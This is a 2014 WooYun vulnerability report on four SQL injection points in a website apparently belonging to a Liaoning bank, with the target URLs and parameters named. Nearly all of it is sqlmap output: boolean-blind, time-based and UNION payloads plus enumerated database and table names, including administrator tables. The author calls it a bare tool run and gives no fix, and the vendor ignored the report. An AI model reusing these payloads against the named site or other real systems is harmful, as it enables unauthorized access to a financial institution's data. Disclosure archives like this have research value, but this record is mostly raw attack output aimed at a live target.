漏洞概要关注数(3)关注此漏洞

漏洞概要
关注数(
3
)
关注此漏洞
缺陷编号：
WooYun-2014-86723
漏洞标题：		辽宁某银行4处sql注入打包
相关厂商：
cncert国家互联网应急中心
漏洞作者：
SuperRookie
提交时间：		2014-12-11 09:34
公开时间：		2014-12-16 09:36
漏洞类型：		SQL注射漏洞
危害等级：		高
自评Rank：		20
漏洞状态：		
																							已交由第三方厂商(cncert国家互联网应急中心)处理
漏洞来源：
http://www.wooyun.org
Tags标签：	
								无
0
人收藏
收藏
分享漏洞：
漏洞详情
披露状态：
2014-12-11：	细节已通知厂商并且等待厂商处理中
2014-12-16：	厂商已经主动忽略漏洞，细节向公众公开
简要描述：
看某刷洞牛 爆了个银行 我也爆一个
详细说明：
没什么详细说明纯属工具跑大
漏洞证明：
http://www.coastalbank.cn/bill.php?id=21 (GET)
http://www.coastalbank.cn/loans.php?id=6
http://www.coastalbank.cn/download.php?sid=2
http://www.coastalbank.cn/savings.php?id=1
sqlmap identified the following injection points with a total of 42 HTTP(s) requests:
---
Place: GET
Parameter: sid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sid=2 AND 5092=5092
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: sid=2 AND SLEEP(5)
---
web server operating system: Linux CentOS 5.8
web application technology: PHP 5.2.10, Apache 2.2.3
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 41 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=6 AND 9165=9165
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=6 UNION ALL SELECT NULL,CONCAT(0x71657a7471,0x6b465468434e4d744361,0x7171677471)#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=6 AND SLEEP(5)
---
web server operating system: Linux CentOS 5.8
web application technology: PHP 5.2.10, Apache 2.2.3
back-end DBMS: MySQL 5.0.11
Database: yhyh20120823
[12 tables]
+---------------------------------------+
| administrator                         |
| class                                 |
| cpclass                               |
| datainfo                              |
| down                                  |
| info                                  |
| link                                  |
| logs                                  |
| ly_info1                              |
| nyy_administrator                     |
| pic                                   |
| web_config                            |
+---------------------------------------+
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| KEY_COLUMN_USAGE                      |
| PROFILING                             |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
sqlmap identified the following injection points with a total of 42 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1581=1581
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x7177796a71,0x6e65656a775056506253,0x7173636b71)#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
web server operating system: Linux CentOS 5.8
web application technology: PHP 5.2.10, Apache 2.2.3
back-end DBMS: MySQL 5.0.11
Database: yhyh20120823
[12 tables]
+---------------------------------------+
| administrator                         |
| class                                 |
| cpclass                               |
| datainfo                              |
| down                                  |
| info                                  |
| link                                  |
| logs                                  |
| ly_info1                              |
| nyy_administrator                     |
| pic                                   |
| web_config                            |
+---------------------------------------+
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| KEY_COLUMN_USAGE                      |
| PROFILING                             |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
sqlmap identified the following injection points with a total of 43 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=21 AND 3797=3797
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=21 UNION ALL SELECT NULL,CONCAT(0x7161747171,0x7971446e6f574c754d59,0x716a687871)#
---
web server operating system: Linux CentOS 5.8
web application technology: PHP 5.2.10, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.0
Database: yhyh20120823
[12 tables]
+---------------------------------------+
| administrator                         |
| class                                 |
| cpclass                               |
| datainfo                              |
| down                                  |
| info                                  |
| link                                  |
| logs                                  |
| ly_info1                              |
| nyy_administrator                     |
| pic                                   |
| web_config                            |
+---------------------------------------+
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| KEY_COLUMN_USAGE                      |
| PROFILING                             |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| KEY_COLUMN_USAGE                      |
| PROFILING                             |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
Database: yhyh20120823
[12 tables]
+---------------------------------------+
| administrator                         |
| class                                 |
| cpclass                               |
| datainfo                              |
| down                                  |
| info                                  |
| link                                  |
| logs                                  |
| ly_info1                              |
| nyy_administrator                     |
| pic                                   |
| web_config                            |
+---------------------------------------+
修复方案：
自行解决
版权声明：转载请注明来源
SuperRookie
@
乌云
漏洞回应
厂商回应：
危害等级：无影响厂商忽略
忽略时间：2014-12-11 09:34
厂商回复：
最新状态：
暂无
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价
(共
0
人评价)
:
登陆后才能进行评分